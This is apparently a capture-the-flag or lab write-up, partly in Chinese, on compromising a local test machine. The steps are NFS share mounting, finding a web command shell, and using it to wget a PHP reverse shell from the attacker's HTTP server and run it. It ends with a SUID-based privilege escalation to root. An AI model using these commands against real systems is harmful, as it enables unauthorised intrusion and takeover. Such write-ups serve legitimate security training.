ipaddress : 192.168.56.3 ### information_gathering ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608865524235-74726992-d081-4cec-b021-d99840b6ef3f.png#align=left&display=inline&height=155&margin=%5Bobject%20Object%5D&name=image.png&originHeight=310&originWidth=1398&size=142882&status=done&style=none&width=699) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608865555892-ecc055fb-6cda-4105-a05c-a729943a43c9.png#align=left&display=inline&height=502&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1004&originWidth=1436&size=552178&status=done&style=none&width=718) 发现2049开放 139开放 先关注下这两个 2049 nfs -> ``` show mount -e 192.168.56.14 ``` ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866280687-d37f8fa5-bcb8-4255-ad60-da9dbf18749c.png#align=left&display=inline&height=67&margin=%5Bobject%20Object%5D&name=image.png&originHeight=134&originWidth=1132&size=40099&status=done&style=none&width=566) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866402623-5f9596d2-2cc9-411c-beb2-fa6ae5cd87b3.png#align=left&display=inline&height=640&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1280&originWidth=1412&size=769970&status=done&style=none&width=706) nfs挂载home/user5 ``` mount -t nfs 192.168.56.14:/home/user5 /tmp ``` ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866681894-c5927fca-f186-4bef-bf28-2e93d8ead0fe.png#align=left&display=inline&height=669&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1338&originWidth=3222&size=1427904&status=done&style=none&width=1611) ### Establish a foothold 暂时放一边,对80端口进行 dirbrute,发现 一个cmd shell ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866932440-db708e8d-c0e0-4aac-a7c5-54f4bf0b137e.png#align=left&display=inline&height=267&margin=%5Bobject%20Object%5D&name=image.png&originHeight=534&originWidth=1676&size=221790&status=done&style=none&width=838) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866958861-90984e93-2074-41e9-a1e4-856f58037490.png#align=left&display=inline&height=112&margin=%5Bobject%20Object%5D&name=image.png&originHeight=224&originWidth=1006&size=23153&status=done&style=none&width=503) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866980068-12f4df19-0419-42c1-bbd0-1c7a607fd74a.png#align=left&display=inline&height=138&margin=%5Bobject%20Object%5D&name=image.png&originHeight=276&originWidth=1116&size=34958&status=done&style=none&width=558) using: Attack computer run python3 -m http.server-> [http://192.168.56.14/shell.php?cmd=wget%20192.168.56.3:8000/php-reverse-shell.php%20-O%20/tmp/shell.php](http://192.168.56.14/shell.php?cmd=wget%20192.168.56.3:8000/php-reverse-shell.php%20-O%20/tmp/shell.php) and run ``` shell.php?cmd=php+/tmp/shell.php ``` ->reverse a shell ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608867235184-4a6129a2-56d6-4e6c-9a91-393a2e7a0d85.png#align=left&display=inline&height=298&margin=%5Bobject%20Object%5D&name=image.png&originHeight=596&originWidth=1828&size=345694&status=done&style=none&width=914) ### Privilege Escalation ``` find / -perm -4000 -type f 2>/dev/null ``` ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608868057398-654707be-3831-4afb-ab04-74355e46747c.png#align=left&display=inline&height=644&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1288&originWidth=1266&size=491910&status=done&style=none&width=633) run ./script and run ./shell to find something ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608868176140-d5e55afa-c723-4f71-8944-9f4da4852bc3.png#align=left&display=inline&height=454&margin=%5Bobject%20Object%5D&name=image.png&originHeight=908&originWidth=1072&size=327852&status=done&style=none&width=536) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608868107634-c4a1c49c-915a-4a3e-a15d-0580faa6d174.png#align=left&display=inline&height=229&margin=%5Bobject%20Object%5D&name=image.png&originHeight=458&originWidth=1046&size=142139&status=done&style=none&width=523) okay,we get root,but we can find else the ./script is like ls